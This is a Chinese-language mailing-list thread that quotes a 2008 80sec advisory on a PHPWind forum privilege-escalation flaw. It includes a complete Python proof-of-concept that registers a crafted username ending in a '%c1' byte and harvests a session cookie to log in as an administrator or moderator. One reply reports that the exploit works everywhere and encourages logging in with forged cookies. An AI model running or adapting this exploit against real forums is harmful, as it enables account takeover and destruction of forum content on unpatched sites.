测试了,通杀。 6.3版本以下,自己改COOKIE登陆吧,太爽了。
在08-6-1,baicker <[EMAIL PROTECTED]> 写道: > > %c1 ? 行不行啊? > > 2008/5/31 est <[EMAIL PROTECTED]>: > >> http://www.80sec.com/release/phpwind-exploit.txt >> >> 漏洞发布:http://www.80sec.com/ >> >> [EMAIL PROTECTED] >> >> 漏洞厂商: http://www.phpwind.com/ >> PHPWind 论坛系统 是一套采用 php+mysql 数据库 方式运行并可生成 html >> 页面的全新且完善的强大系统。因具有非凡的访问 >> 速度和卓越的负载能力而深受国内外朋友的喜爱。 >> 本漏洞影响phpwind所有版本 >> >> 漏洞危害:高 >> >> 漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作 >> >> 利用方式:http://www.80sec.com有提供exploit >> >> 漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限 >> >> 漏洞修补:建议关闭注册功能等待官方出补丁 >> >> 漏洞状态:08.5.25发现此漏洞 >> 08.6.1由80sec.com <http://08.6.1%e7%94%b180sec.com/>公开此漏洞 >> 暂无补丁 >> >> 漏洞测试: >> >> [code] >> # -*- coding: gb2312 -*- >> import urllib2,httplib,sys >> httplib.HTTPConnection.debuglevel = 1 >> cookies = urllib2.HTTPCookieProcessor() >> opener = urllib2.build_opener(cookies) >> >> >> def banner(): >> print "" >> print "########################################################" >> print "Phpwind所有版本管理权限泄露漏洞利用poc" >> print "Copyright (C) 2006" >> print "[EMAIL PROTECTED]" >> print "80sec是一个新的致力于web安全的小团体" >> print "http://www.80sec.com"; >> >> def usage(): >> banner() >> print "Usage:\n" >> print " $ ./phpwind.py pwforumurl usertoattack\n" >> print " pwforumurl 目标论坛地址如http://www.80sec.com/"; >> print " usertoattack 目标拥有权限的斑竹或管理员" >> print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户" >> print " 最新版本可以使用uid登陆" >> print " 其他版本可以使用cookie+useragent登陆" >> print "########################################################" >> print "" >> >> >> argvs=sys.argv >> usage() >> >> >> data = "regname=%s >> %s1&[EMAIL PROTECTED]&[EMAIL PROTECTED]&[EMAIL PROTECTED] >> ®emailtoall=1&step=2" >> % (argvs[2],"%c1") >> pwurl = "%s/register.php" % argvs[1] >> >> request = urllib2.Request( >> url = pwurl , >> headers = {'Content-Type' : 'application/x-www-form- >> urlencoded','User-Agent': '80sec owned this'}, >> data = data) >> >> f=opener.open(request) >> headers=f.headers.dict >> cookie=headers["set-cookie"] >> try: >> if cookie.index('winduser'): >> print "Exploit Success!" >> print "Login with uid password @80sec or Cookie:" >> print cookie >> print "User-agent: 80sec owned this" >> except: >> print "Error! http://www.80sec.com"; >> print "Connect root#80sec.com" >> [/code] >> >> >> >> >> > > > -- > BLOG: http://www.blogjava.net/baicker > > > --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
